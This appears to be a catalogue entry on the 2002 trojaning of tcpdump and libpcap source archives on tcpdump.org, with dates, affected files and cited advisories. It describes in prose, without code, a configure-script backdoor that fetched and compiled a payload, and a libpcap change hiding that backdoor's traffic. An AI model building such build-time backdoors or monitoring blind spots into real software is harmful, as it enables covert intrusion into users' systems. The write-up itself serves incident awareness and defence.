tcpdump.org source tarballs trojanized

In November 2002, the tcpdump.org HTTP distribution path began serving trojaned source archives for both tcpdump and libpcap. CERT and CIAC identified modified copies of tcpdump-3.6.2.tar.gz, tcpdump-3.7.1.tar.gz, and libpcap-0.7.1.tar.gz; the poisoned downloads appeared around 10:14 GMT on November 11 and were disabled at 15:05:19 GMT on November 13.

The delivery split across related tools. tcpdump carried build-time code that fetched and compiled a payload. libpcap, the packet capture library under it, was changed to hide traffic on the port the payload used.

This compromise was more elaborate than a single hidden shell. The tcpdump configure script attempted to fetch a shell script named services over HTTP, generate conftes.c, compile it, and run it. The resulting program connected to a fixed address on TCP/1963 and accepted byte-sized commands to exit, sleep, or spawn an obfuscated shell. Libpcap was changed in gencode.c to hide traffic on port 1963, bending the sniffer's own eyes away from the backdoor.

That pairing is why the incident still stands out. The attacker did not just compromise a network diagnostic tool; they also altered the capture library so the diagnostic stack was less likely to see the backdoor's own traffic. Verification had to cover both archives, not only the obvious tcpdump executable.

Motive

Unauthorized Access

Cause

Compromised Infrastructure

Transitive

No

• Arch Linux forum thread on trojaned tcpdump/libpcap sourcesbbs.archlinux.org
• Popular packet sniffing packages contaminated by Trojantheregister.com
• libpcap and tcpdump sources trojanedlinuxsecurity.com
• Trojaned tcpdump and libpcaplwn.net
• CERT Advisory CA-2002-30: Trojan Horse tcpdump and libpcap Distributionsseclists.org
• CIAC N-014: Trojan Horse tcpdump and libpcap Distributionsartofhacking.com